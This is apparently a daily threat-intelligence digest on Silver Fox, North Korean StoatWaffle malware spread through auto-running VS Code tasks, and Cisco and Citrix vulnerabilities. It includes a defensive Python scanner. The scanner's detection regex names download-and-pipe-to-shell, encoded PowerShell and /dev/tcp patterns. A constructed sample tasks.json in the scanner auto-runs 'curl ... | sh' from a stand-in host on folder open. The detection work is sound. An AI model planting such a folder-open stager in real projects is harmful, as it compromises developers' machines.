
Cyware Daily Threat Intelligence, March 24, 2026


The China-nexus group Silver Fox has moved from opportunistic financial theft to APT-grade operations, now targeting government and financial sectors in East and Southeast Asia. Masquerading as national taxation authorities, the group delivers its modular ValleyRAT and HoldingHands backdoors through a multi-stage kill chain that has recently evolved to include Python-based stealers disguised as WhatsApp applications.

The Contagious Interview campaign is exploiting the trust built into developer workflows by abusing Visual Studio Code's automatic tasks to distribute a new malware family called StoatWaffle. The chain ends in a modular framework that steals browser credentials and macOS Keychain data, which means that opening an untrusted project folder in the editor and granting it workspace trust can lead to full workstation compromise.

A critical CVSS 10.0 vulnerability in Cisco Secure Firewall Management Center (FMC) has prompted CISA to impose a three-day patching deadline on federal civilian agencies, following revelations that it was exploited as a zero-day for more than a month. Tracked as CVE-2026-20131, this insecure deserialization flaw let the Interlock ransomware group execute arbitrary Java code as root on unpatched appliances.

Top Malware Reported in the Last 24 Hours

Silver Fox conducts tax-themed malware campaigns

Silver Fox, a China-based intrusion group, has evolved since 2024 from financially motivated cybercrime into APT-style operations. Using modular malware such as ValleyRAT and HoldingHands, the group runs parallel campaigns, one for financial gain and one for espionage. Its lures are culturally tailored phishing, notably impersonation of national taxation authorities, used to gain initial access to victims in Taiwan, Japan, and Malaysia. Through 2025 and 2026, Silver Fox's delivery moved from malicious PDFs to abuse of misconfigured remote monitoring and management (RMM) tools and, most recently, to a Python-based stealer disguised as a WhatsApp application.

Contagious Interview drops StoatWaffle malware

North Korean actors behind the Contagious Interview campaign (also tracked as WaterPlum) are abusing Visual Studio Code to distribute a new malware family called StoatWaffle. The lure project carries a .vscode/tasks.json whose task sets "runOptions": {"runOn": "folderOpen"}, so VS Code launches the task automatically when the folder is opened; because automatic tasks run only in trusted workspaces, the attack depends on the victim accepting the Workspace Trust prompt. StoatWaffle bundles a stealer that captures browser credentials and a remote access trojan (RAT) that executes operator commands, and it targets both Windows and macOS. The actors also publish malicious npm packages and compromise GitHub repositories to spread the malware, and they use fake job interviews as social engineering against senior professionals in the cryptocurrency and Web3 sectors.
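As an added example (not code from Cyware or from the research it summarises), the Python script below walks a checkout for .vscode/tasks.json files, parses VS Code's comment-tolerant JSON, and reports every task that would launch on folder open, flagging commands that look like download-and-execute stagers. The two embedded tasks.json documents and the keyword list are constructed for illustration; the regex is a triage heuristic for the technique, not a signature for StoatWaffle.

```python
"""Find VS Code tasks that auto-run on folder open (runOptions.runOn = folderOpen)."""
import json
import re
import sys
from pathlib import Path

# Hypothetical triage heuristic for stager-like commands; tune for your environment.
SUSPICIOUS = re.compile(
    r"(curl|wget|Invoke-WebRequest|iwr)\b.*\|\s*(sh|bash|zsh|iex)"
    r"|powershell.*-(e|enc|encodedcommand)\b"
    r"|(python3?|node)\s+-[ce]\s"
    r"|base64\s+(-d|--decode)"
    r"|nohup|/dev/tcp/",
    re.IGNORECASE,
)


def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments outside strings, then trailing commas, so that
    VS Code's JSON-with-comments tasks.json can be fed to json.loads."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep escaped char, including \"
                out.append(text[i + 1]); i += 2; continue
            in_str = c != '"'
            i += 1
        elif c == '"':
            in_str = True; out.append(c); i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i); i = n if j == -1 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2); i = n if j == -1 else j + 2
        else:
            out.append(c); i += 1
    # Trailing commas before } or ] (a ",}" inside a string would also be hit; rare)
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def parse_jsonc(text: str) -> dict:
    return json.loads(strip_jsonc(text))


def task_commands(task: dict) -> list[str]:
    """Flatten command + args for the base task and each per-OS override section."""
    cmds = []
    for section in (task, *(task.get(k) or {} for k in ("windows", "linux", "osx"))):
        if "command" in section:
            parts = [section["command"], *section.get("args", task.get("args", []))]
        elif section is task and task.get("type") == "npm" and "script" in task:
            parts = ["npm", "run", task["script"]]   # npm-type tasks carry no "command"
        else:
            continue
        # args may be strings or {"value": ..., "quoting": ...} objects
        cmds.append(" ".join(p.get("value", "") if isinstance(p, dict) else str(p) for p in parts))
    return cmds


def find_auto_tasks(tasks_json: str) -> list[dict]:
    """Return every task VS Code would start automatically when the folder is opened."""
    hits = []
    for task in parse_jsonc(tasks_json).get("tasks", []):
        if str(task.get("runOptions", {}).get("runOn", "default")).lower() != "folderopen":
            continue
        cmds = task_commands(task)
        hits.append({"label": task.get("label", "<unlabelled>"), "commands": cmds,
                     "suspicious": any(SUSPICIOUS.search(c) for c in cmds)})
    return hits


def scan_tree(root: Path) -> list[tuple[Path, dict]]:
    """Walk a checkout and report folderOpen tasks under any .vscode directory."""
    findings = []
    for path in root.rglob("tasks.json"):
        if path.parent.name != ".vscode":
            continue
        try:
            findings += [(path, h) for h in find_auto_tasks(path.read_text(encoding="utf-8-sig"))]
        except (OSError, ValueError) as exc:     # unreadable, or not parseable as JSONC
            findings.append((path, {"label": "<parse error>", "commands": [str(exc)], "suspicious": True}))
    return findings


# Constructed samples for illustration; not real StoatWaffle artefacts.
BENIGN_TASKS_JSON = r'''{
  // Comments and trailing commas are legal in VS Code's JSONC
  "version": "2.0.0",
  "tasks": [
    { "label": "deps", "type": "shell", "command": "npm", "args": ["install"],
      "runOptions": { "runOn": "folderOpen" }, },
    { "label": "build", "type": "npm", "script": "build" }
  ]
}'''

STAGER_TASKS_JSON = r'''{
  "version": "2.0.0",
  "tasks": [ {
    "label": "postinstall", "type": "shell",
    "command": "sh", "args": ["-c", "curl -fsSL https://example.invalid/s | sh"],
    "windows": { "command": "powershell", "args": ["-enc", "ZWNobw=="] },
    "runOptions": { "runOn": "folderOpen" }
  } ]
}'''

if __name__ == "__main__":
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else Path(".")
    for path, hit in scan_tree(root):
        flag = "SUSPICIOUS" if hit["suspicious"] else "review"
        print(f"[{flag}] {path}: {hit['label']}: {' ; '.join(hit['commands'])}")
```

Run it against a fresh clone before the folder is ever opened in the editor; any folderOpen task deserves a read, and the flagged ones deserve a sandbox. Independently of scanning, setting "task.allowAutomaticTasks": "off" in user settings and leaving Workspace Trust enabled removes this execution path entirely for untrusted folders.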

Top Vulnerabilities Reported in the Last 24 Hours

Citrix urges urgent patching for vulnerabilities

Citrix has released security updates for vulnerabilities in NetScaler ADC and NetScaler Gateway, notably CVE-2026-3055 (CVSS 9.3), an out-of-bounds read that an unauthenticated remote attacker can trigger to leak sensitive data from the appliance's memory; it affects appliances configured as a SAML Identity Provider (IdP). A second flaw, CVE-2026-4368 (CVSS 7.7), is a race condition that can cause user session mix-ups and affects appliances configured as a Gateway or AAA virtual server. Affected versions of NetScaler ADC and Gateway include the 14.1 and 13.1 branches.

Patch this Cisco bug, urges CISA

CISA has ordered federal civilian agencies to patch a critical remote code execution vulnerability, CVE-2026-20131, in Cisco Secure Firewall Management Center (FMC), which carries the maximum CVSS score of 10.0. The flaw lets unauthenticated attackers execute arbitrary Java code as root, and the Interlock ransomware group exploited it as a zero-day from January 26, 2026. Cisco released a fix on March 4; CISA added the CVE to its Known Exploited Vulnerabilities (KEV) catalog on March 19 with a three-day remediation deadline. After initial access, the attackers used the compromised FMC for persistence and lateral movement, relying on PowerShell scripts and custom remote access trojans to retain control of compromised systems.
